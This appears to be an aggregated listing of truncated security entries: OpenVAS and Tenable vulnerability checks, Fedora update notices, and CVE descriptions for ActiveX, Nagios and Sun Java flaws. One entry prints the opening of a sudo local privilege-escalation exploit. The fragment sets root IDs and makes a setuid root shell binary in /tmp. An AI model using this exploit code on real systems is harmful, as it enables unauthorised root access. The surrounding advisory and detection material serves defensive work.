Fedora Update for postgresql FEDORA-2007-198

Check for the Version of postgresql OpenVAS Vulnerability Test Fedora Update for postgresql FEDORA-2007-198 Authors: System Generated Check Copyright: Copyright c 2009 Greenbone Networks GmbH, http://www.greenbone.net This program is free software; you can redistribute it and/or modify it under t...

Top 5 Tips to Avoid Viruses and Spyware

In this video, Chris Pirillo offers some valuable advice for keeping your computer safe from malicious programs:...

Fedora Update for mozvoikko FEDORA-2008-8425

Check for the Version of mozvoikko OpenVAS Vulnerability Test Fedora Update for mozvoikko FEDORA-2008-8425 Authors: System Generated Check Copyright: Copyright c 2009 Greenbone Networks GmbH, http://www.greenbone.net This program is free software; you can redistribute it and/or modify it under th...

Fedora Update for adminutil FEDORA-2008-7642

Check for the Version of adminutil OpenVAS Vulnerability Test Fedora Update for adminutil FEDORA-2008-7642 Authors: System Generated Check Copyright: Copyright c 2009 Greenbone Networks GmbH, http://www.greenbone.net This program is free software; you can redistribute it and/or modify it under th...

Fedora Update for adminutil FEDORA-2008-7339

Check for the Version of adminutil OpenVAS Vulnerability Test Fedora Update for adminutil FEDORA-2008-7339 Authors: System Generated Check Copyright: Copyright c 2009 Greenbone Networks GmbH, http://www.greenbone.net This program is free software; you can redistribute it and/or modify it under th...

Microsoft Visual Basic Kill Bits

Visual Basic is an event-driven programming language that was created by Microsoft for building stand alone Windows-based programs. Developers can use it for quickly building GUI applications. Several remote code execution vulnerabilities have been reported in Microsoft Visual Basic. To trigger...

AutoDesk LiveUpdate ActiveX Control ApplyPatch Method Execution

The version of the LiveUpdate ActiveX control, a component included with AutoCAD-based products and installed on the remote Windows host, reportedly allows execution of arbitrary programs via the second argument to the control's 'ApplyPatch' method. If an attacker can trick a user on the affected...

WoW ActiveX 2.x Multiple RCE Vulnerabilities

WoW ActiveX is prone to multiple remote code execution RCE vulnerabilities. SPDX-FileCopyrightText: 2009 Greenbone AG Some text descriptions might be excerpted from a referenced sources, and are Copyright C by the respective right holders. SPDX-License-Identifier: GPL-2.0-only ifdescription...

Design/Logic Flaw

Multiple insecure method vulnerabilities in the Web On Windows WOW ActiveX control in WOW ActiveX 2 allow remote attackers to 1 create and overwrite arbitrary files via the WriteIniFileString method, 2 execute arbitrary programs via the ShellExecute method, 3 read from the registry via unspecifie...

CVE-2009-0389

Multiple insecure method vulnerabilities in the Web On Windows WOW ActiveX control in WOW ActiveX 2 allow remote attackers to 1 create and overwrite arbitrary files via the WriteIniFileString method, 2 execute arbitrary programs via the ShellExecute method, 3 read from the registry via unspecifie...

CVE-2009-0389

WoW ActiveX 2.x is vulnerable to multiple remote code execution (RCE) vulnerabilities in the Web On Windows WOW ActiveX control. The CVE-2009-0389 description cites insecure methods (WriteIniFileString, ShellExecute) that can lead to arbitrary file writes or execution, and possible registry acces...

CA Unicenter Cron Scheduler Detection

The remote service is a Cron Scheduler for CA Unicenter applications, that is used to launch programs at specified times. %NASLMINLEVEL 70300 C Tenable Network Security, Inc. include'deprecatednasllevel.inc'; include"compat.inc"; if description scriptid35309; scriptversion"1.11";...

[SECURITY] Fedora 9 Update: mozvoikko-0.9.5-5.fc9

This is mozvoikko, an extension for Mozilla programs for using the Finnish spell-checker Voikko...

Buffer overflow

Multiple buffer overflows in Sun Java Wireless Toolkit WTK for CLDC 2.5.2 and earlier allow downloaded programs to execute arbitrary code via unknown vectors...

[SECURITY] Fedora 10 Update: nagios-3.0.5-1.fc10

Nagios is a program that will monitor hosts and services on your network. It has the ability to send email or page alerts when a problem arises and when a problem is resolved. Nagios is written in C and is designed to run under Linux and some other NIX variants as a background process,...

Sudo 1.6.9p18 - Defaults SetEnv Local Privilege Escalation

Sudo 1.6.9p18 - Defaults SetEnv Local Privilege Escalation !/bin/sh Sudo "Defaults setenv" so environ vars are preserved : program.c include include include void init if !geteuid unsetenv"LDPRELOAD"; setgid0; setuid0; execl"/bin/sh","sh","-c","chown 0:0 /tmp/xxxx; /bin/chmod +xs /tmp/xxxx",NULL;...

Microsoft Visual Basic ActiveX Controls Remote Code Execution (MS08-070; CVE-2008-3704; CVE-2008-4252; CVE-2008-4253; CVE-2008-4254; CVE-2008-4255; CVE-2008-4256)

Visual Basic is an event-driven programming language that was created by Microsoft for building stand alone Windows-based programs. Developers can use it for quickly building GUI applications. Several remote code execution vulnerabilities have been reported in Microsoft Visual Basic: CVE-2008-425...

CVE-2008-5028

Cross-site request forgery CSRF vulnerability in cmd.cgi in 1 Nagios 3.0.5 and 2 op5 Monitor before 4.0.1 allows remote attackers to send commands to the Nagios process, and trigger execution of arbitrary programs by this process, via unspecified HTTP requests...

Authorization

The Nagios process in 1 Nagios before 3.0.5 and 2 op5 Monitor before 4.0.1 allows remote authenticated users to bypass authorization checks, and trigger execution of arbitrary programs by this process, via an a custom form or a b browser addon...

CVE-2008-5027

The Nagios process in 1 Nagios before 3.0.5 and 2 op5 Monitor before 4.0.1 allows remote authenticated users to bypass authorization checks, and trigger execution of arbitrary programs by this process, via an a custom form or a b browser addon...